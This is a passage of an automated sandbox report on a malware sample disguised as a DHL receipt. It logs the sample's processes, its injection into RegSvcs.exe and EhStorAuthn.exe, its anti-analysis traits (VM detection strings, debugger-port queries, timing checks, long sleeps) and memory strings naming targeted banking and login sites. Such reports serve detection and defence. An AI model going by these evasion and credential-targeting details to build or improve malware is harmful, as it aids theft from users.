                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe  Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: DHL AWB Receipt_pdf.bat.exe PID: 3180, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: oSJLRdDbLeQ.exe PID: 5592, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Memory allocated: 21D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Memory allocated: 2350000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Memory allocated: 4350000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Memory allocated: 89B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Memory allocated: 7260000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Memory allocated: 99B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Memory allocated: A9B0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe Memory allocated: 15E0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe Memory allocated: 3180000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe Memory allocated: 2EE0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe Memory allocated: 92F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe Memory allocated: 7A90000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe Memory allocated: A2F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe Memory allocated: B2F0000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_0101096E rdtsc 10_2_0101096E
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8434
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9090
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 498
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Window / User API: threadDelayed 9841
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API coverage: 0.7 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API coverage: 0.2 %
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 7156 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6432 Thread sleep count: 8434 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2780 Thread sleep time: -8301034833169293s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6432 Thread sleep count: 281 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5672 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3624 Thread sleep time: -11990383647911201s >= -30000s
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe TID: 7180 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 7540 Thread sleep count: 132 > 30
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 7540 Thread sleep time: -264000s >= -30000s
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 7540 Thread sleep count: 9841 > 30
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 7540 Thread sleep time: -19682000s >= -30000s
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe TID: 7556 Thread sleep time: -65000s >= -30000s
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe TID: 7556 Thread sleep time: -43500s >= -30000s
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe TID: 7556 Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Last function: Thread delayed
                Source: 46G3-7765.18.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 46G3-7765.18.dr Binary or memory string: discord.comVMware20,11696428655f
                Source: 46G3-7765.18.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 46G3-7765.18.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 46G3-7765.18.dr Binary or memory string: global block list test formVMware20,11696428655
                Source: 46G3-7765.18.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: oSJLRdDbLeQ.exe, 0000000B.00000002.2458086544.0000000009115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: 46G3-7765.18.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 46G3-7765.18.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 46G3-7765.18.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: 46G3-7765.18.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 46G3-7765.18.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 46G3-7765.18.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 46G3-7765.18.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 46G3-7765.18.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 46G3-7765.18.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000002.4687131877.0000000000959000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2787536888.00000250E334C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 46G3-7765.18.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 46G3-7765.18.dr Binary or memory string: outlook.office.comVMware20,11696428655s
                Source: 46G3-7765.18.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 46G3-7765.18.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 46G3-7765.18.dr Binary or memory string: AMC password management pageVMware20,11696428655
                Source: 46G3-7765.18.dr Binary or memory string: tasks.office.comVMware20,11696428655o
                Source: 46G3-7765.18.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 46G3-7765.18.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 46G3-7765.18.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 46G3-7765.18.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 46G3-7765.18.dr Binary or memory string: dev.azure.comVMware20,11696428655j
                Source: 46G3-7765.18.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 46G3-7765.18.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 46G3-7765.18.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 46G3-7765.18.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 46G3-7765.18.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Process information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Process queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_0101096E rdtsc 10_2_0101096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_004179B3 LdrLoadDll,10_2_004179B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_0107E10E mov eax, dword ptr fs:[00000030h] 10_2_0107E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_0107E10E mov ecx, dword ptr fs:[00000030h] 10_2_0107E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_00FCC0F0 mov eax, dword ptr fs:[00000030h] 10_2_00FCC0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_00FD80E9 mov eax, dword ptr fs:[00000030h] 10_2_00FD80E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01090115 mov eax, dword ptr fs:[00000030h] 10_2_01090115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_00FCA0E3 mov ecx, dword ptr fs:[00000030h] 10_2_00FCA0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_0107A118 mov ecx, dword ptr fs:[00000030h] 10_2_0107A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_0107A118 mov eax, dword ptr fs:[00000030h] 10_2_0107A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01000124 mov eax, dword ptr fs:[00000030h] 10_2_01000124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01064144 mov eax, dword ptr fs:[00000030h] 10_2_01064144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01064144 mov ecx, dword ptr fs:[00000030h] 10_2_01064144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01068158 mov eax, dword ptr fs:[00000030h] 10_2_01068158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_00FD208A mov eax, dword ptr fs:[00000030h] 10_2_00FD208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_0108C188 mov eax, dword ptr fs:[00000030h] 10_2_0108C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01010185 mov eax, dword ptr fs:[00000030h] 10_2_01010185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01074180 mov eax, dword ptr fs:[00000030h] 10_2_01074180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_00FFC073 mov eax, dword ptr fs:[00000030h] 10_2_00FFC073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_0105019F mov eax, dword ptr fs:[00000030h] 10_2_0105019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_00FD2050 mov eax, dword ptr fs:[00000030h] 10_2_00FD2050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_010961C3 mov eax, dword ptr fs:[00000030h] 10_2_010961C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_0104E1D0 mov eax, dword ptr fs:[00000030h] 10_2_0104E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_0104E1D0 mov ecx, dword ptr fs:[00000030h] 10_2_0104E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_00FCA020 mov eax, dword ptr fs:[00000030h] 10_2_00FCA020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_00FCC020 mov eax, dword ptr fs:[00000030h] 10_2_00FCC020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_00FEE016 mov eax, dword ptr fs:[00000030h] 10_2_00FEE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_010A61E5 mov eax, dword ptr fs:[00000030h] 10_2_010A61E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_010001F8 mov eax, dword ptr fs:[00000030h] 10_2_010001F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01054000 mov ecx, dword ptr fs:[00000030h] 10_2_01054000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01072000 mov eax, dword ptr fs:[00000030h] 10_2_01072000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01066030 mov eax, dword ptr fs:[00000030h] 10_2_01066030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01056050 mov eax, dword ptr fs:[00000030h] 10_2_01056050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_00FCA197 mov eax, dword ptr fs:[00000030h] 10_2_00FCA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_00FD6154 mov eax, dword ptr fs:[00000030h] 10_2_00FD6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_00FCC156 mov eax, dword ptr fs:[00000030h] 10_2_00FCC156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_010680A8 mov eax, dword ptr fs:[00000030h] 10_2_010680A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_010960B8 mov eax, dword ptr fs:[00000030h] 10_2_010960B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_010960B8 mov ecx, dword ptr fs:[00000030h] 10_2_010960B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_010520DE mov eax, dword ptr fs:[00000030h] 10_2_010520DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_010560E0 mov eax, dword ptr fs:[00000030h] 10_2_010560E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_010120F0 mov ecx, dword ptr fs:[00000030h] 10_2_010120F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_0100A30B mov eax, dword ptr fs:[00000030h] 10_2_0100A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_00FE02E1 mov eax, dword ptr fs:[00000030h] 10_2_00FE02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_00FDA2C3 mov eax, dword ptr fs:[00000030h] 10_2_00FDA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_01052349 mov eax, dword ptr fs:[00000030h] 10_2_01052349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01078350 mov ecx, dword ptr fs:[00000030h]10_2_01078350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105035C mov eax, dword ptr fs:[00000030h]10_2_0105035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105035C mov eax, dword ptr fs:[00000030h]10_2_0105035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105035C mov eax, dword ptr fs:[00000030h]10_2_0105035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105035C mov ecx, dword ptr fs:[00000030h]10_2_0105035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105035C mov eax, dword ptr fs:[00000030h]10_2_0105035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105035C mov eax, dword ptr fs:[00000030h]10_2_0105035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0109A352 mov eax, dword ptr fs:[00000030h]10_2_0109A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE02A0 mov eax, dword ptr fs:[00000030h]10_2_00FE02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE02A0 mov eax, dword ptr fs:[00000030h]10_2_00FE02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107437C mov eax, dword ptr fs:[00000030h]10_2_0107437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FC826B mov eax, dword ptr fs:[00000030h]10_2_00FC826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD4260 mov eax, dword ptr fs:[00000030h]10_2_00FD4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD4260 mov eax, dword ptr fs:[00000030h]10_2_00FD4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD4260 mov eax, dword ptr fs:[00000030h]10_2_00FD4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD6259 mov eax, dword ptr fs:[00000030h]10_2_00FD6259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCA250 mov eax, dword ptr fs:[00000030h]10_2_00FCA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0108C3CD mov eax, dword ptr fs:[00000030h]10_2_0108C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010563C0 mov eax, dword ptr fs:[00000030h]10_2_010563C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FC823B mov eax, dword ptr fs:[00000030h]10_2_00FC823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010743D4 mov eax, dword ptr fs:[00000030h]10_2_010743D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010743D4 mov eax, dword ptr fs:[00000030h]10_2_010743D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107E3DB mov eax, dword ptr fs:[00000030h]10_2_0107E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107E3DB mov eax, dword ptr fs:[00000030h]10_2_0107E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107E3DB mov ecx, dword ptr fs:[00000030h]10_2_0107E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107E3DB mov eax, dword ptr fs:[00000030h]10_2_0107E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010063FF mov eax, dword ptr fs:[00000030h]10_2_010063FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FEE3F0 mov eax, dword ptr fs:[00000030h]10_2_00FEE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FEE3F0 mov eax, dword ptr fs:[00000030h]10_2_00FEE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FEE3F0 mov eax, dword ptr fs:[00000030h]10_2_00FEE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE03E9 mov eax, dword ptr fs:[00000030h]10_2_00FE03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE03E9 mov eax, dword ptr fs:[00000030h]10_2_00FE03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE03E9 mov eax, dword ptr fs:[00000030h]10_2_00FE03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE03E9 mov eax, dword ptr fs:[00000030h]10_2_00FE03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE03E9 mov eax, dword ptr fs:[00000030h]10_2_00FE03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE03E9 mov eax, dword ptr fs:[00000030h]10_2_00FE03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE03E9 mov eax, dword ptr fs:[00000030h]10_2_00FE03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE03E9 mov eax, dword ptr fs:[00000030h]10_2_00FE03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD83C0 mov eax, dword ptr fs:[00000030h]10_2_00FD83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD83C0 mov eax, dword ptr fs:[00000030h]10_2_00FD83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD83C0 mov eax, dword ptr fs:[00000030h]10_2_00FD83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD83C0 mov eax, dword ptr fs:[00000030h]10_2_00FD83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]10_2_00FDA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]10_2_00FDA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]10_2_00FDA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]10_2_00FDA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]10_2_00FDA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]10_2_00FDA3C0
